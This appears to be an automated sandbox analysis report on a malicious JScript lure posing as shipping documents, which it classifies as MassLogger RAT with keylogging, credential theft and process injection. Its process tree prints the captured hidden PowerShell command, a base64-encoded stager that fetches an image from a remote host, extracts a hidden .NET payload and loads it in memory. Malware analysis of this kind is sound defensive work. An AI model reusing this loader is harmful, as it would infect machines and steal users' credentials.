Windows
Analysis Report
Shipping Documents SI 694_pdf.js
Overview
General Information
Detection
MSIL Logger, MassLogger RAT
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Joe Sandbox ML detected suspicious sample
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7148 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Shipp ing Docume nts SI 694 _pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 6852 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -nop -w hi dden -c "$ fronts = ' JABhAGwAYg BpAGYAbABv AHIAbwB1AH MAIAA9ACAA JwAwAC8AUw A0AHgAUQBT AFYAWgB4AC 8AZAAvAGUA ZQAuAGUAIw BzAGEAcAAv AC8AOgBzAH AAIwAjAGgA JwA7ACQAbQ B1AGwAdABp AGYAbABvAH IAbwB1AHMA IAA9ACAAJA BhAGwAYgBp AGYAbABvAH IAbwB1AHMA IAAtAHIAZQ BwAGwAYQBj AGUAIAAnAC MAJwAsACAA JwB0ACcAOw AkAGMAbwB6 AGkAbgBlAH MAcwAgAD0A IAAnAGgAdA B0AHAAcwA6 AC8ALwBhAH IAYwBoAGkA dgBlAC4Abw ByAGcALwBk AG8AdwBuAG wAbwBhAGQA LwBuAGUAdw BfAGkAbQBh AGcAZQBfAD IAMAAyADUA MAA0ADEAMw AvAG4AZQB3 AF8AaQBtAG EAZwBlAC4A agBwAGcAJw A7ACQAbABv AHUAbgBnAG kAbgBnACAA PQAgAE4AZQ B3AC0ATwBi AGoAZQBjAH QAIABTAHkA cwB0AGUAbQ AuAE4AZQB0 AC4AVwBlAG IAQwBsAGkA ZQBuAHQAOw AkAGwAbwB1 AG4AZwBpAG 4AZwAuAEgA ZQBhAGQAZQ ByAHMALgBB AGQAZAAoAC cAVQBzAGUA cgAtAEEAZw BlAG4AdAAn ACwAJwBNAG 8AegBpAGwA bABhAC8ANQ AuADAAJwAp ADsAJABNAG MASQBuAHQA aQByAGUAIA A9ACAAJABs AG8AdQBuAG cAaQBuAGcA LgBEAG8Adw BuAGwAbwBh AGQARABhAH QAYQAoACQA YwBvAHoAaQ BuAGUAcwBz ACkAOwAkAG 0AbwBuAG8A dAByAG8AcA BpAHMAbQAg AD0AIABbAF MAeQBzAHQA ZQBtAC4AVA BlAHgAdAAu AEUAbgBjAG 8AZABpAG4A ZwBdADoAOg BVAFQARgA4 AC4ARwBlAH QAUwB0AHIA aQBuAGcAKA AkAE0AYwBJ AG4AdABpAH IAZQApADsA JAByAGUAYw BvAG0AZgBv AHIAdABsAG UAcwBzACAA PQAgACcAPA A8AEIAQQBT AEUANgA0AF 8AUwBUAEEA UgBUAD4APg AnADsAJABu AG8AZABvAG kAZAAgAD0A IAAnADwAPA BCAEEAUwBF ADYANABfAE UATgBEAD4A PgAnADsAJA B1AG4AYwBy AGUAYQB0AG kAdgBlACAA PQAgACQAbQ BvAG4AbwB0 AHIAbwBwAG kAcwBtAC4A SQBuAGQAZQ B4AE8AZgAo ACQAcgBlAG MAbwBtAGYA bwByAHQAbA BlAHMAcwAp ADsAJABiAG UAbgB6AG8A dABoAGkAYQ B6AGkAbgBl AHMAIAA9AC AAJABtAG8A bgBvAHQAcg BvAHAAaQBz AG0ALgBJAG 4AZABlAHgA TwBmACgAJA BuAG8AZABv AGkAZAApAD sAJAB1AG4A YwByAGUAYQ B0AGkAdgBl ACAALQBnAG UAIAAwACAA LQBhAG4AZA AgACQAYgBl AG4AegBvAH QAaABpAGEA egBpAG4AZQ BzACAALQBn AHQAIAAkAH UAbgBjAHIA ZQBhAHQAaQ B2AGUAOwAk AHUAbgBjAH IAZQBhAHQA aQB2AGUAIA ArAD0AIAAk AHIAZQBjAG 8AbQBmAG8A cgB0AGwAZQ BzAHMALgBM AGUAbgBnAH QAaAA7ACQA SABhAHQAaA BvAHIAIAA9 ACAAJABiAG UAbgB6AG8A dABoAGkAYQ B6AGkAbgBl AHMAIAAtAC AAJAB1AG4A YwByAGUAYQ B0AGkAdgBl ADsAJAByAG UAdgBvAGwA dQB0AGkAbw BuAGkAegBl AGQAIAA9AC AAJABtAG8A bgBvAHQAcg BvAHAAaQBz AG0ALgBTAH UAYgBzAHQA cgBpAG4AZw AoACQAdQBu AGMAcgBlAG EAdABpAHYA ZQAsACAAJA BIAGEAdABo AG8AcgApAD sAJABtAGUA bQBvAHIAYQ BiAGwAZQBu AGUAcwBzAC AAPQAgAFsA UwB5AHMAdA BlAG0ALgBD AG8AbgB2AG UAcgB0AF0A OgA6AEYAcg BvAG0AQgBh AHMAZQA2AD QAUwB0AHIA aQBuAGcAKA AkAHIAZQB2 AG8AbAB1AH QAaQBvAG4A aQB6AGUAZA ApADsAJABj AHUAbAB0AH IAYQB0AGUA IAA9ACAAWw BTAHkAcwB0 AGUAbQAuAF IAZQBmAGwA ZQBjAHQAaQ BvAG4ALgBB AHMAcwBlAG 0AYgBsAHkA XQA6ADoATA BvAGEAZAAo ACQAbQBlAG 0AbwByAGEA YgBsAGUAbg BlAHMAcwAp ADsAJAByAG UAcwBpAHQA dQBhAHQAZQ BzACAAPQAg AFsAZABuAG wAaQBiAC4A SQBPAC4ASA BvAG0AZQBd